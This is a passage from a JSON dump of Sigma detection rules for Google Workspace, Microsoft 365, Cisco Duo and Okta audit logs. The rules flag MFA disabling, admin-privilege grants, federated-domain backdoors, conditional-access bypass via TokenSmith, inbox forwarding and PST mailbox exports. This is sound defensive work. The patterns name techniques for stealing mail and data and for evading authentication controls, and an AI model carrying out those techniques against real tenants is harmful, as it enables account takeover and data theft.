    "content": "title: Google Workspace Application Removed\nid: ee2803f0-71c8-4831-b48b-a1fc57601ee4\nstatus: test\ndescription: Detects when an application is removed from Google Workspace.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST\nauthor: Austin Songer\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName:\n            - REMOVE_APPLICATION\n            - REMOVE_APPLICATION_FROM_WHITELIST\n    condition: selection\nfalsepositives:\n    - Application being removed may be performed by a System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml",
    "content": "title: Google Workspace Granted Domain API Access\nid: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba\nstatus: test\ndescription: Detects when an API access service account is granted domain authority.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS\nauthor: Austin Songer\ndate: 2021-08-23\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName: AUTHORIZE_API_CLIENT_ACCESS\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_mfa_disabled.yml",
    "content": "title: Google Workspace MFA Disabled\nid: 780601d1-6376-4f2a-884e-b8d45599f78c\nstatus: test\ndescription: Detects when multi-factor authentication (MFA) is disabled.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION\nauthor: Austin Songer\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection_base:\n        eventService: admin.googleapis.com\n        eventName:\n            - ENFORCE_STRONG_AUTHENTICATION\n            - ALLOW_STRONG_AUTHENTICATION\n    selection_eventValue:\n        new_value: 'false'\n    condition: all of selection*\nfalsepositives:\n    - MFA may be disabled and performed by a system administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml",
    "content": "title: Google Workspace Role Modified or Deleted\nid: 6aef64e3-60c6-4782-8db3-8448759c714e\nstatus: test\ndescription: Detects when a role is modified or deleted in Google Workspace.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings\nauthor: Austin Songer\ndate: 2021-08-24\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName:\n            - DELETE_ROLE\n            - RENAME_ROLE\n            - UPDATE_ROLE\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_role_privilege_deleted.yml",
    "content": "title: Google Workspace Role Privilege Deleted\nid: bf638ef7-4d2d-44bb-a1dc-a238252e6267\nstatus: test\ndescription: Detects when a role privilege is deleted in Google Workspace.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings\nauthor: Austin Songer\ndate: 2021-08-24\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName: REMOVE_PRIVILEGE\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml",
    "content": "title: Google Workspace User Granted Admin Privileges\nid: 2d1b83e4-17c6-4896-a37b-29140b40a788\nstatus: test\ndescription: Detects when a Google Workspace user is granted admin privileges.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE\nauthor: Austin Songer\ndate: 2021-08-23\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName:\n            - GRANT_DELEGATED_ADMIN_PRIVILEGES\n            - GRANT_ADMIN_PRIVILEGE\n    condition: selection\nfalsepositives:\n    - Google Workspace admin role privileges may be modified by system administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/audit/microsoft365_bypass_conditional_access.yml",
    "content": "title: Azure Login Bypassing Conditional Access Policies\nid: 13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc\nstatus: experimental\ndescription: |\n    Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and Intune device trust using a tool like TokenSmith.\nauthor: Josh Nickels, Marius Rothenbücher\nreferences:\n    - https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/\n    - https://github.com/JumpsecLabs/TokenSmith\ndate: 2025-01-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    service: audit\n    product: m365\ndetection:\n    selection:\n        Operation: 'UserLoggedIn'\n        ApplicationId: '9ba1a5c7-f17a-4de9-a1f1-6178c8d51223'\n        ResultStatus: 'Success'\n        RequestType: 'Cmsi:Cmsi'\n    filter_main_objectid:\n        ObjectId: '0000000a-0000-0000-c000-000000000000' # Microsoft Intune seen when mobile devices are enrolled\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/m365/audit/microsoft365_disabling_mfa.yml",
    "content": "title: Disabling Multi Factor Authentication\nid: 60de9b57-dc4d-48b9-a6a0-b39e0469f876\nstatus: test\ndescription: Detects disabling of Multi Factor Authentication.\nreferences:\n    - https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/\nauthor: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)\ndate: 2023-09-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556.006\nlogsource:\n    service: audit\n    product: m365\ndetection:\n    selection:\n        Operation|contains: 'Disable Strong Authentication.'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml",
    "content": "title: New Federated Domain Added\nid: 58f88172-a73d-442b-94c9-95eaed3cbb36\nrelated:\n    - id: 42127bdd-9133-474f-a6f1-97b6c08a4339\n      type: similar\nstatus: test\ndescription: Detects the addition of a new Federated Domain.\nreferences:\n    - https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/\n    - https://o365blog.com/post/aadbackdoor/\nauthor: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.002\nlogsource:\n    service: audit\n    product: m365\ndetection:\n    selection_domain:\n        Operation|contains: 'domain'\n    selection_operation:\n        Operation|contains:\n            - 'add'\n            - 'new'\n    condition: all of selection_*\nfalsepositives:\n    - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml",
    "content": "title: New Federated Domain Added - Exchange\nid: 42127bdd-9133-474f-a6f1-97b6c08a4339\nrelated:\n    - id: 58f88172-a73d-442b-94c9-95eaed3cbb36\n      type: similar\nstatus: test\ndescription: Detects the addition of a new Federated Domain.\nreferences:\n    - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf\n    - https://us-cert.cisa.gov/ncas/alerts/aa21-008a\n    - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html\n    - https://www.sygnia.co/golden-saml-advisory\n    - https://o365blog.com/post/aadbackdoor/\nauthor: Splunk Threat Research Team (original rule), '@ionsor (rule)'\ndate: 2022-02-08\ntags:\n    - attack.persistence\n    - attack.t1136.003\nlogsource:\n    service: exchange\n    product: m365\ndetection:\n    selection:\n        eventSource: Exchange\n        eventName: 'Add-FederatedDomain'\n        status: success\n    condition: selection\nfalsepositives:\n    - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml",
    "content": "title: Activity from Suspicious IP Addresses\nid: a3501e8e-af9e-43c6-8cd6-9360bdaae498\nstatus: test\ndescription: |\n  Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence.\n  These IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    service: threat_detection\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity from suspicious IP addresses'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml",
    "content": "title: Activity Performed by Terminated User\nid: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee\nstatus: test\ndescription: |\n  Detects when Microsoft Cloud App Security reports activity by users whose accounts were terminated in Azure AD but who still perform activities on other platforms such as AWS or Salesforce.\n  This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity performed by terminated user'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml",
    "content": "title: Activity from Anonymous IP Addresses\nid: d8b0a4fe-07a8-41be-bd39-b14afa025d95\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity from anonymous IP addresses'\n        status: success\n    condition: selection\nfalsepositives:\n    - User using a VPN or Proxy\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml",
    "content": "title: Activity from Infrequent Country\nid: 0f2468a2-5055-4212-a368-7321198ee706\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity from infrequent country'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml",
    "content": "title: Data Exfiltration to Unsanctioned Apps\nid: 2b669496-d215-47d8-bd9a-f4a45bf07cda\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Data exfiltration to unsanctioned apps'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml",
    "content": "title: Microsoft 365 - Impossible Travel Activity\nid: d7eab125-5f94-43df-8710-795b80fa1189\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2020-07-06\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Impossible travel activity'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml",
    "content": "title: Logon from a Risky IP Address\nid: c191e2fa-f9d6-4ccf-82af-4f2aba08359f\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Log on from a risky IP address'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml",
    "content": "title: Microsoft 365 - Potential Ransomware Activity\nid: bd132164-884a-48f1-aa2d-c6d646b04c69\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: austinsonger\ndate: 2021-08-19\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Potential ransomware activity'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml",
    "content": "title: PST Export Alert Using eDiscovery Alert\nid: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0\nrelated:\n    - id: 6897cd82-6664-11ed-9022-0242ac120002\n      type: similar\nstatus: test\ndescription: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content\nreferences:\n    - https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide\nauthor: Sorina Ionescu\ndate: 2022-02-08\nmodified: 2022-11-17\ntags:\n    - attack.collection\n    - attack.t1114\nlogsource:\n    service: threat_management\n    product: m365\n    definition: Requires the 'eDiscovery search or exported' alert to be enabled\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'eDiscovery search started or exported'\n        status: success\n    condition: selection\nfalsepositives:\n    - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml",
    "content": "title: PST Export Alert Using New-ComplianceSearchAction\nid: 6897cd82-6664-11ed-9022-0242ac120002\nrelated:\n    - id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0\n      type: similar\nstatus: test\ndescription: Alert when a user has performed an export of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect a PST export even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage and to usage from the cloud.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps\nauthor: Nikita Khalimonenkov\ndate: 2022-11-17\ntags:\n    - attack.collection\n    - attack.t1114\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        Payload|contains|all:\n            - 'New-ComplianceSearchAction'\n            - 'Export'\n            - 'pst'\n    condition: selection\nfalsepositives:\n    - Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml",
    "content": "title: Suspicious Inbox Forwarding\nid: 6c220477-0b5b-4b25-bb90-66183b4089e8\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-22\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Suspicious inbox forwarding'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml",
    "content": "title: Suspicious OAuth App File Download Activities\nid: ee111937-1fe7-40f0-962a-0eb44d57d174\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Suspicious OAuth app file download activities'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml",
    "content": "title: Microsoft 365 - Unusual Volume of File Deletion\nid: 78a34b67-3c39-4886-8fb4-61c46dc18ecd\nstatus: test\ndescription: Detects when a Microsoft Cloud App Security reported that a user has deleted an unusually large volume of files.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: austinsonger\ndate: 2021-08-19\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Unusual volume of file deletion'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml",
    "content": "title: Microsoft 365 - User Restricted from Sending Email\nid: ff246f56-7f24-402a-baca-b86540e3925c\nstatus: test\ndescription: Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: austinsonger\ndate: 2021-08-19\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.t1199\nlogsource:\n    service: threat_management\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'User restricted from sending email'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/cisco_duo/cisco_duo_mfa_bypass_via_bypass_code.yml",
    "content": "title: Cisco Duo Successful MFA Authentication Via Bypass Code\nid: 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8\nstatus: test\ndescription: |\n    Detects when a successful MFA authentication occurs due to the use of a bypass code.\n    A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as \"backup codes,\" so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.\nreferences:\n    - https://duo.com/docs/adminapi#logs\n    - https://help.duo.com/s/article/6327?language=en_US\nauthor: Nikita Khalimonenkov\ndate: 2024-04-17\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.initial-access\nlogsource:\n    product: cisco\n    service: duo\ndetection:\n    selection:\n        event_type: authentication\n        reason: bypass_user\n    condition: selection\nfalsepositives:\n    - Legitimate user that was assigned on purpose to a bypass group\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_admin_activity_from_proxy_query.yml",
    "content": "title: Okta Admin Functions Access Through Proxy\nid: 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309\nstatus: test\ndescription: Detects access to Okta admin functions through a proxy.\nreferences:\n    - https://www.beyondtrust.com/blog/entry/okta-support-unit-breach\n    - https://dataconomy.com/2023/10/23/okta-data-breach/\n    - https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/\nauthor: Muhammad Faisal @faisalusuf\ndate: 2023-10-25\ntags:\n    - attack.credential-access\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        debugContext.debugData.requestUri|contains: 'admin'\n        securityContext.isProxy: 'true'\n    condition: selection\nfalsepositives:\n    - False positives are expected if administrators access these functions through a proxy legitimately. Apply additional filters if necessary.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_admin_role_assigned_to_user_or_group.yml",
    "content": "title: Okta Admin Role Assigned to a User or Group\nid: 413d4a81-6c98-4479-9863-014785fd579c\nstatus: test\ndescription: Detects when the Administrator role is assigned to a user or group.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.003\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - group.privilege.grant\n            - user.account.privilege.grant\n    condition: selection\nfalsepositives:\n    - Administrator roles could be assigned to users or groups by other admin users.\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_admin_role_assignment_created.yml",
    "content": "title: Okta Admin Role Assignment Created\nid: 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c\nstatus: test\ndescription: Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Nikita Khalimonenkov\ndate: 2023-01-19\ntags:\n    - attack.persistence\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: 'iam.resourceset.bindings.add'\n    condition: selection\nfalsepositives:\n    - Legitimate creation of a new admin role assignment\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_api_token_created.yml",
    "content": "title: Okta API Token Created\nid: 19951c21-229d-4ccb-8774-b993c3ff3c5c\nstatus: test\ndescription: Detects when an API token is created.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.persistence\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: system.api_token.create\n    condition: selection\nfalsepositives:\n    - Legitimate creation of an API token by authorized users\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_api_token_revoked.yml",
    "content": "title: Okta API Token Revoked\nid: cf1dbc6b-6205-41b4-9b88-a83980d2255b\nstatus: test\ndescription: Detects when an API token is revoked.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype: system.api_token.revoke\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_application_modified_or_deleted.yml",
    "content": "title: Okta Application Modified or Deleted\nid: 7899144b-e416-4c28-b0b5-ab8f9e0a541d\nstatus: test\ndescription: Detects when an application is modified or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - application.lifecycle.update\n            - application.lifecycle.delete\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_application_sign_on_policy_modified_or_deleted.yml",
    "content": "title: Okta Application Sign-On Policy Modified or Deleted\nid: 8f668cc4-c18e-45fe-ad00-624a981cf88a\nstatus: test\ndescription: Detects when an application Sign-on Policy is modified or deleted.\nreferences:\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-12\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        eventtype:\n            - application.policy.sign_on.update\n            - application.policy.sign_on.rule.delete\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/identity/okta/okta_fastpass_phishing_detection.yml",
    "content": "title: Okta FastPass Phishing Detection\nid: ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e\nstatus: test\ndescription: Detects when Okta FastPass prevents a known phishing site.\nreferences:\n    - https://sec.okta.com/fastpassphishingdetection\n    - https://developer.okta.com/docs/reference/api/system-log/\n    - https://developer.okta.com/docs/reference/api/event-types/\nauthor: Austin Songer @austinsonger\ndate: 2023-05-07\ntags:\n    - attack.initial-access\n    - attack.t1566\nlogsource:\n    product: okta\n    service: okta\ndetection:\n    selection:\n        outcome.reason: 'FastPass declined phishing attempt'\n        outcome.result: FAILURE\n        eventtype: user.authentication.auth_via_mfa\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/identity/okta/okta_identity_provider_created.yml",
